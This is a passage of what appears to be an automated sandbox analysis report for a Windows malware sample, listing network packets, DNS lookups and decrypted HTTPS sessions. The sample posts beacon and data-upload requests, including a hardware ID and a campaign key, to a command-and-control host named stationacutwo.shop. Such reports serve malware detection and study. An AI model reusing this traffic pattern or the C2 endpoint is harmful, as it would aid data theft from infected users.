Jul 2, 2024 21:24:29.949722052 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:30.135370016 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.135402918 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:30.135541916 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.135970116 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.135982990 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:30.625597954 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:30.625689030 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.627038002 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.627049923 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:30.627286911 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:30.629072905 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.629173994 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:30.629180908 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:31.019531012 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:31.019644022 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:31.019758940 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:31.021625996 CEST	49736	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:31.021648884 CEST	443	49736	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.208842993 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.208883047 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.208950043 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.209250927 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.209264040 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.817498922 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.817591906 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.819212914 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.819225073 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.819431067 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.820790052 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.821532011 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.821566105 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.821671963 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.821710110 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.822470903 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.822520971 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.823261023 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.823293924 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.823419094 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.823456049 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.823604107 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.823638916 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.823651075 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.823657990 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.823832989 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.823853970 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.823877096 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.824065924 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.824100971 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.832067966 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.832261086 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.832292080 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:32.832312107 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.832335949 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.832345009 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.832391977 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:32.837526083 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.264435053 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.264514923 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.264569044 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.264789104 CEST	49739	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.264807940 CEST	443	49739	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.279978037 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.280004978 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.280078888 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.280424118 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.280428886 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.777031898 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.777242899 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.778497934 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.778506994 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.778758049 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:34.791002035 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.791028976 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:34.791127920 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:35.222551107 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:35.222630024 CEST	443	49743	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:35.222678900 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:35.222954035 CEST	49743	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:35.222969055 CEST	443	49743	188.114.96.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 21:24:22.973654985 CEST	49591	53	192.168.2.4	1.1.1.1
Jul 2, 2024 21:24:22.992924929 CEST	53	49591	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 2, 2024 21:24:22.973654985 CEST	192.168.2.4	1.1.1.1	0xcf6b	Standard query (0)	stationacutwo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 2, 2024 21:24:22.992924929 CEST	1.1.1.1	192.168.2.4	0xcf6b	No error (0)	stationacutwo.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 2, 2024 21:24:22.992924929 CEST	1.1.1.1	192.168.2.4	0xcf6b	No error (0)	stationacutwo.shop		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

stationacutwo.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:23 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stationacutwo.shop
2024-07-02 19:24:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-02 19:24:23 UTC	804	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=889s5i43f09ip9os9kedimsf7t; expires=Sat, 26-Oct-2024 13:11:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aedj5VitIcPo%2F%2F7DMQCl2OU5%2BQSsm3DGlzNkUEzJLVF8lbSIYCYzdNAi1ZENPTMwwZ5Ol8MIsBArn9R8sSTlM6T1svGy9fSfId%2FzqITHAU6l9w6qUj9e7sRR8s2K8fsgZWi56Fc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d10407c86b41c6-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:23 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-02 19:24:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:24 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: stationacutwo.shop
2024-07-02 19:24:24 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 36 4d 6b 30 4d 2d 2d 6b 65 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=P6Mk0M--key&j=
2024-07-02 19:24:24 UTC	800	IN	HTTP/1.1 200 OK Date: Tue, 02 Jul 2024 19:24:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=egdifgtqg2grmagipb1kelfrmb; expires=Sat, 26-Oct-2024 13:11:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G2ZzKgy63u3YSiK%2FCj03rl6P5Is38PrmYhggom88O9svB8NIN8UNTVwgY0QjYYdVTn%2F4LJo69b3zP7F5099p42pioN9udSxOu5BAhEtfaQqGzdh8GxQ67EW4K7pbMdsrgY9rtuw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89d1040d4b49423d-EWR alt-svc: h3=":443"; ma=86400
2024-07-02 19:24:24 UTC	569	IN	Data Raw: 35 30 65 30 0d 0a 41 4d 47 65 48 62 61 2f 54 57 31 71 6f 2b 75 37 78 2b 6b 6d 55 43 44 73 4c 4d 59 44 49 6a 70 51 73 75 4a 53 4a 6f 59 68 50 59 46 37 79 35 63 2f 77 4a 31 33 54 56 36 50 34 62 4c 6c 6d 6b 4e 79 47 73 78 59 74 48 5a 48 46 6c 71 37 77 44 4e 43 70 42 73 64 35 32 47 74 37 58 69 61 74 55 52 50 44 39 76 4a 67 65 65 79 4c 46 6b 70 6c 77 7a 6b 5a 6b 77 59 61 70 4c 41 4e 30 7a 6b 51 46 48 6a 59 61 72 78 62 64 72 63 4a 51 45 4e 79 34 37 59 6f 34 68 4b 50 55 57 4a 53 61 64 70 54 46 4d 39 32 6f 39 77 43 71 59 44 57 50 73 69 2b 37 34 2f 2b 39 6f 35 44 43 66 43 6d 4e 44 6c 79 56 74 38 4b 75 55 6c 76 53 4d 41 58 7a 36 51 32 48 49 45 35 30 52 66 37 57 61 6c 39 58 58 65 31 79 6b 4f 44 73 6d 62 30 71 47 42 54 6a 4a 45 68 55 4f 73 63 30 35 63 4f 74 79 42 50 Data Ascii: 50e0AMGeHba/TW1qo+u7x+kmUCDsLMYDIjpQsuJSJoYhPYF7y5c/wJ13TV6P4bLlmkNyGsxYtHZHFlq7wDNCpBsd52Gt7XiatURPD9vJgeeyLFkplwzkZkwYapLAN0zkQFHjYarxbdrcJQENy47Yo4hKPUWJSadpTFM92o9wCqYDWPsi+74/+9o5DCfCmNDlyVt8KuUlvSMAXz6Q2HIE50Rf7Wal9XXe1ykODsmb0qGBTjJEhUOsc05cOtyBP
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 75 43 77 62 50 6a 64 57 6a 68 55 6b 39 52 49 52 4f 6f 32 74 49 55 44 50 64 69 7a 39 45 34 55 35 62 35 57 36 69 2b 54 2b 61 6e 32 38 49 45 49 48 52 6d 2b 57 6c 51 7a 46 51 7a 48 75 6e 62 30 35 66 4a 4a 44 43 4c 77 71 4d 4b 44 54 36 49 4f 50 37 63 35 53 46 62 55 38 47 78 49 62 4c 70 4a 6c 42 50 46 43 43 53 36 4a 73 51 31 59 79 31 59 63 39 53 75 4a 45 58 4f 74 6d 6f 76 4a 7a 33 74 34 72 44 45 69 50 79 35 6d 69 6b 77 52 71 41 4d 35 2f 70 32 56 48 53 6a 48 65 77 48 4a 62 71 69 73 30 69 48 76 68 76 48 6a 59 6e 58 64 4e 53 4d 75 50 31 4b 79 41 51 7a 70 4f 6e 45 57 72 59 6b 6c 66 4e 4e 71 44 4f 45 37 69 54 56 37 6b 5a 36 54 75 63 64 2f 51 4c 41 55 4f 67 63 65 62 35 59 78 63 63 68 72 4d 44 6f 70 69 55 55 34 41 30 35 45 68 42 4b 5a 63 45 59 73 4a 79 4f 55 39 6c 4e Data Ascii: uCwbPjdWjhUk9RIROo2tIUDPdiz9E4U5b5W6i+T+an28IEIHRm+WlQzFQzHunb05fJJDCLwqMKDT6IOP7c5SFbU8GxIbLpJlBPFCCS6JsQ1Yy1Yc9SuJEXOtmovJz3t4rDEiPy5mikwRqAM5/p2VHSjHewHJbqis0iHvhvHjYnXdNSMuP1KyAQzpOnEWrYklfNNqDOE7iTV7kZ6Tucd/QLAUOgceb5YxcchrMDopiUU4A05EhBKZcEYsJyOU9lN
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 67 35 61 58 7a 65 41 76 4b 77 44 4f 53 61 67 68 47 42 70 79 33 49 6b 77 54 2b 35 48 58 2b 52 76 70 76 39 34 31 39 41 6f 42 51 62 47 6a 64 57 73 68 6b 49 79 52 59 70 4c 74 6d 52 4a 56 44 36 51 7a 6e 49 45 34 31 73 66 75 79 44 6a 30 33 6a 43 33 67 41 4d 47 63 6a 4a 6d 37 72 46 4c 46 6b 70 6c 77 7a 6b 5a 6b 77 59 61 70 4c 41 4e 30 48 73 53 46 6e 72 59 72 48 35 63 64 2f 63 4a 51 6b 4a 7a 49 58 66 70 59 70 45 4e 45 36 4f 53 61 4e 7a 55 6c 30 30 77 6f 70 77 43 71 59 44 57 50 73 69 2b 37 34 2f 34 73 30 34 48 68 36 44 76 4e 71 72 68 55 4d 6b 41 73 78 52 36 67 6b 72 4d 79 75 53 77 44 64 49 70 42 73 64 6f 32 6d 6a 38 48 6a 63 32 79 73 48 42 38 36 41 79 36 53 48 53 69 42 46 6a 6b 65 71 62 6b 78 52 50 39 65 4e 4f 30 37 70 52 31 6a 69 49 75 32 2b 50 39 50 46 62 31 64 Data Ascii: g5aXzeAvKwDOSaghGBpy3IkwT+5HX+Rvpv9419AoBQbGjdWshkIyRYpLtmRJVD6QznIE41sfuyDj03jC3gAMGcjJm7rFLFkplwzkZkwYapLAN0HsSFnrYrH5cd/cJQkJzIXfpYpENE6OSaNzUl00wopwCqYDWPsi+74/4s04Hh6DvNqrhUMkAsxR6gkrMyuSwDdIpBsdo2mj8Hjc2ysHB86Ay6SHSiBFjkeqbkxRP9eNO07pR1jiIu2+P9PFb1d
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 4b 36 4e 54 7a 56 46 69 45 4f 73 62 45 56 62 4d 39 53 4b 49 6b 66 76 53 56 4c 70 49 75 32 2b 50 39 50 46 62 31 64 4b 67 61 37 56 6a 4a 74 66 49 46 54 4f 44 4c 73 76 4b 44 4e 5a 79 63 4a 77 51 2b 67 44 42 36 45 69 6f 50 4e 32 32 39 55 6e 41 41 66 46 68 39 2b 6a 68 6b 45 39 53 4a 78 47 71 6d 78 4c 56 7a 6e 43 67 44 31 41 36 45 64 58 36 47 6a 6a 73 6a 32 55 32 6a 64 50 55 49 50 4a 37 4b 69 45 52 44 46 55 7a 67 79 37 4c 79 67 7a 57 63 6e 43 63 45 50 6f 41 77 65 68 49 71 2f 79 66 39 76 52 49 77 51 41 77 49 58 58 6f 6f 35 4e 4f 6b 71 63 54 36 42 70 51 56 59 39 30 59 51 31 51 65 42 45 57 2b 56 74 34 37 49 39 6c 4e 6f 33 54 31 43 44 79 66 61 43 76 67 59 54 65 4d 34 4d 75 79 38 6f 4d 31 6e 4a 77 6e 42 44 36 41 4d 48 6f 53 4b 76 2f 33 50 63 30 69 6b 47 42 4d 75 41 Data Ascii: K6NTzVFiEOsbEVbM9SKIkfvSVLpIu2+P9PFb1dKga7VjJtfIFTODLsvKDNZycJwQ+gDB6EioPN229UnAAfFh9+jhkE9SJxGqmxLVznCgD1A6EdX6Gjjsj2U2jdPUIPJ7KiERDFUzgy7LygzWcnCcEPoAwehIq/yf9vRIwQAwIXXoo5NOkqcT6BpQVY90YQ1QeBEW+Vt47I9lNo3T1CDyfaCvgYTeM4Muy8oM1nJwnBD6AMHoSKv/3Pc0ikGBMuA
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 45 78 52 34 68 50 70 47 31 4b 58 7a 72 61 6a 6a 31 43 34 45 56 5a 6f 79 7a 68 76 48 6a 4d 6e 58 64 4e 53 50 4f 45 31 36 79 49 51 6a 39 55 70 6e 2f 6b 49 31 38 57 57 72 76 72 4b 51 61 6b 52 46 4f 6a 4f 75 47 38 65 39 2f 56 49 77 6f 41 78 49 6a 52 72 34 4e 4c 50 56 43 50 51 61 31 6d 53 31 55 39 33 6f 55 2b 56 75 4e 49 56 4f 74 72 72 66 6f 2f 6d 70 39 76 43 42 43 42 30 5a 76 6c 76 55 63 38 53 5a 39 42 70 32 30 41 47 69 32 65 36 46 73 76 2f 51 45 66 35 47 37 6a 70 44 32 55 31 79 51 4c 43 38 57 4d 31 71 53 4b 51 69 42 46 68 31 79 71 62 45 39 51 4f 74 6d 42 4e 45 48 70 52 56 50 70 59 36 54 79 63 64 79 64 59 55 31 49 78 70 47 5a 2f 63 6b 45 45 31 4b 56 58 4c 4a 73 59 56 55 39 6b 4d 49 76 43 6f 77 6f 4e 50 6f 67 34 2f 74 7a 6c 49 56 74 54 77 48 54 6a 64 53 33 67 Data Ascii: ExR4hPpG1KXzrajj1C4EVZoyzhvHjMnXdNSPOE16yIQj9Upn/kI18WWrvrKQakRFOjOuG8e9/VIwoAxIjRr4NLPVCPQa1mS1U93oU+VuNIVOtrrfo/mp9vCBCB0ZvlvUc8SZ9Bp20AGi2e6Fsv/QEf5G7jpD2U1yQLC8WM1qSKQiBFh1yqbE9QOtmBNEHpRVPpY6TycdydYU1IxpGZ/ckEE1KVXLJsYVU9kMIvCowoNPog4/tzlIVtTwHTjdS3g
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 47 51 4b 68 70 52 45 6f 79 32 34 6b 2f 52 65 74 44 58 4f 4a 6f 71 2b 35 35 31 4e 59 6e 43 41 44 46 68 38 75 6b 68 41 52 38 41 4d 35 4a 76 43 45 59 47 6e 4c 68 6c 6a 64 44 36 77 46 32 35 48 6d 69 39 6e 7a 66 30 57 39 4e 46 34 2f 68 73 73 36 53 42 6e 4a 46 67 67 37 38 49 77 42 56 50 74 32 45 49 6b 6a 6b 51 31 62 6b 61 4c 48 7a 63 4e 6e 65 4c 77 6f 61 77 4a 76 57 72 6f 35 48 4e 6b 32 42 51 71 78 72 41 42 5a 77 6b 49 63 6f 42 4c 77 42 48 38 39 68 73 76 59 39 38 38 63 35 43 41 54 51 67 74 53 70 79 77 59 74 44 4f 59 6c 7a 33 67 43 47 44 58 63 77 47 67 47 70 45 4e 65 37 6e 43 6d 2f 58 58 65 30 43 63 41 44 63 53 47 33 61 47 41 53 69 42 4d 67 55 36 69 61 6b 46 64 4d 64 75 4b 50 6b 33 32 41 78 47 68 49 71 54 6b 50 34 79 66 62 79 55 54 77 49 54 56 35 36 56 50 4a 45 Data Ascii: GQKhpREoy24k/RetDXOJoq+551NYnCADFh8ukhAR8AM5JvCEYGnLhljdD6wF25Hmi9nzf0W9NF4/hss6SBnJFgg78IwBVPt2EIkjkQ1bkaLHzcNneLwoawJvWro5HNk2BQqxrABZwkIcoBLwBH89hsvY988c5CATQgtSpywYtDOYlz3gCGDXcwGgGpENe7nCm/XXe0CcADcSG3aGASiBMgU6iakFdMduKPk32AxGhIqTkP4yfbyUTwITV56VPJE
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 61 45 42 57 4d 74 47 4e 4d 41 53 71 41 52 2f 6b 65 75 4f 6b 50 5a 54 34 44 42 67 65 79 38 76 36 73 70 31 4f 4e 55 36 59 52 61 56 69 56 6c 55 69 6b 4d 49 76 43 6f 77 6f 4e 50 6f 67 34 2f 74 7a 6c 49 56 74 54 77 50 4f 68 39 53 75 6a 30 30 33 53 6f 31 4c 6f 57 74 4d 56 44 50 59 69 54 70 42 34 55 56 56 34 47 79 73 2f 58 50 51 31 43 45 47 53 49 2f 4c 6d 61 4b 54 42 47 6f 41 7a 6e 69 30 5a 6c 68 56 49 70 4b 79 4d 31 58 31 56 6c 4c 7a 5a 4f 48 54 66 4e 6a 65 4b 67 67 59 67 63 76 47 36 2b 4d 76 57 56 76 4d 44 71 4e 74 41 41 42 77 6b 49 41 30 53 4f 64 45 55 65 78 76 72 50 74 30 32 39 63 68 48 51 66 45 67 64 57 74 68 6c 59 34 53 4a 78 48 72 57 78 4f 55 43 44 54 77 48 34 47 70 45 52 48 6f 7a 72 68 76 45 33 65 33 69 4d 5a 42 63 37 4a 6d 37 72 46 4c 46 6b 70 6c 77 7a Data Ascii: aEBWMtGNMASqAR/keuOkPZT4DBgey8v6sp1ONU6YRaViVlUikMIvCowoNPog4/tzlIVtTwPOh9Suj003So1LoWtMVDPYiTpB4UVV4Gys/XPQ1CEGSI/LmaKTBGoAzni0ZlhVIpKyM1X1VlLzZOHTfNjeKggYgcvG6+MvWVvMDqNtAABwkIA0SOdEUexvrPt029chHQfEgdWthlY4SJxHrWxOUCDTwH4GpERHozrhvE3e3iMZBc7Jm7rFLFkplwz
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 44 2f 66 69 33 41 4b 6a 43 67 30 69 43 4b 6c 76 43 65 57 6a 57 46 6e 59 36 72 69 6d 61 47 61 42 47 6f 41 33 68 7a 2f 4e 42 4d 50 59 6f 4c 6f 57 79 2f 37 44 54 65 49 43 62 71 55 46 4c 2b 32 62 78 6c 49 6d 63 75 4c 36 2b 4d 76 57 53 6e 4f 58 4f 51 35 41 68 68 31 30 35 49 69 51 75 64 56 58 4b 52 63 6e 64 39 6f 77 74 63 30 54 53 37 47 6d 4e 43 7a 68 6c 59 4d 66 4b 42 44 70 57 4a 4f 47 67 50 47 6a 53 42 48 34 55 52 68 33 57 79 6b 36 48 6a 61 32 79 39 50 52 71 6e 69 73 73 37 4c 53 33 49 61 7a 48 66 6b 4b 51 42 6e 66 4c 6a 72 57 79 2b 6b 57 78 2b 37 49 4f 50 4a 66 4e 72 54 4b 42 6b 5a 6a 4b 72 4f 73 34 46 66 63 47 53 4a 58 36 31 33 54 55 70 79 6e 75 68 62 4c 34 38 44 57 61 4d 36 34 61 77 78 76 4c 5a 45 5a 45 6a 46 6d 4a 6e 39 79 52 52 67 47 64 73 64 38 7a 45 53 Data Ascii: D/fi3AKjCg0iCKlvCeWjWFnY6rimaGaBGoA3hz/NBMPYoLoWy/7DTeICbqUFL+2bxlImcuL6+MvWSnOXOQ5Ahh105IiQudVXKRcnd9owtc0TS7GmNCzhlYMfKBDpWJOGgPGjSBH4URh3Wyk6Hja2y9PRqniss7LS3IazHfkKQBnfLjrWy+kWx+7IOPJfNrTKBkZjKrOs4FfcGSJX613TUpynuhbL48DWaM64awxvLZEZEjFmJn9yRRgGdsd8zES
2024-07-02 19:24:24 UTC	1369	IN	Data Raw: 74 62 4c 36 52 62 48 37 73 67 34 38 6c 38 32 74 4d 6f 47 52 6d 4d 72 74 65 69 69 6c 49 69 54 34 4a 76 70 33 42 4b 47 48 79 34 36 31 73 76 70 45 55 66 75 79 44 78 73 68 65 2f 74 6b 52 50 44 4e 44 4a 67 65 66 62 46 6d 6b 58 33 52 6e 30 4d 79 67 7a 57 63 2f 4f 57 43 2b 50 57 6a 65 49 43 63 69 38 61 5a 53 46 62 56 31 47 71 65 4b 79 7a 73 74 57 63 68 72 4d 44 75 4e 69 55 6b 6f 30 30 35 59 7a 41 39 70 39 65 76 52 68 73 2f 70 38 36 75 4d 45 41 77 37 47 6b 39 36 6a 72 57 52 79 44 4f 59 6c 7a 77 6f 41 56 33 4b 49 77 67 6b 45 72 41 4e 67 72 51 72 49 6c 78 53 55 78 57 39 58 53 6f 47 38 32 71 75 46 51 79 52 54 77 32 75 7a 59 6c 42 65 4d 5a 44 4f 57 43 2b 50 4b 42 2f 6c 49 76 75 2b 4c 35 71 31 52 47 52 6a 67 59 33 49 35 64 4d 47 59 68 44 56 47 2f 63 32 45 41 70 61 75 Data Ascii: tbL6RbH7sg48l82tMoGRmMrteiilIiT4Jvp3BKGHy461svpEUfuyDxshe/tkRPDNDJgefbFmkX3Rn0MygzWc/OWC+PWjeICci8aZSFbV1GqeKyzstWchrMDuNiUko005YzA9p9evRhs/p86uMEAw7Gk96jrWRyDOYlzwoAV3KIwgkErANgrQrIlxSUxW9XSoG82quFQyRTw2uzYlBeMZDOWC+PKB/lIvu+L5q1RGRjgY3I5dMGYhDVG/c2EApau

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	188.114.96.3	443	7344	C:\Users\user\Desktop\SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-02 19:24:25 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18161 Host: stationacutwo.shop
2024-07-02 19:24:25 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 42 37 33 42 34 42 33 32 34 31 34 44 34 41 43 33 38 44 43 46 30 35 36 36 43 33 30 45 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"77B73B4B32414D4AC38DCF0566C30E6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
